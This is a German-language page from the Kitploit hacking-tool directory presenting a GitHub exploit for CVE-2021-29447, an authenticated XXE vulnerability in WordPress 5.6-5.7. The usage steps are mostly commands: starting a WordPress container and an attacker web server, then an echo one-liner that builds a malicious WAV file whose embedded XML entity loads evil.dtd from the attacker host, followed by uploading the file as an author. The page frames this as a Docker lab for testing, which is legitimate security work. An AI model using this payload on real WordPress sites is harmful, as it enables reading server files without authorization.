Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/motikan2010/cve-2021-29447
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubmotikan2010/cve-2021-29447

CVE-2021-29447

WordPress - Authentifiziertes XXE (CVE-2021-29447)

Repository anzeigen
4311vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WordPress 5.6-5.7 – Authentifiziert (Autor+) XXE (CVE-2021-29447)

Verwendung

Schritt 1. WordPress ausführen

root@kitploit:~
$ make up-wp

Schritt 2. Angreifer-Webserver ausführen

root@kitploit:~
$ make up-mal

Schritt 3. Bösartige WAV-Datei erzeugen

Ohne wavefile-npm (empfohlen)

root@kitploit:~
$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://host.docker.internal:8001/evil.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav
Tool herunterladen

Mit wavefile-npm

root@kitploit:~
$ make make-wav

Schritt 4. Bei WordPress anmelden und WAV-Datei unter „Neue Medien“ hochladen

Schritt 5. Dekodieren

Referenzen

  • WordPress 5.6-5.7 – Authentifizierte XXE-Sicherheitslücke in der Mediathek, die PHP 8 betrifft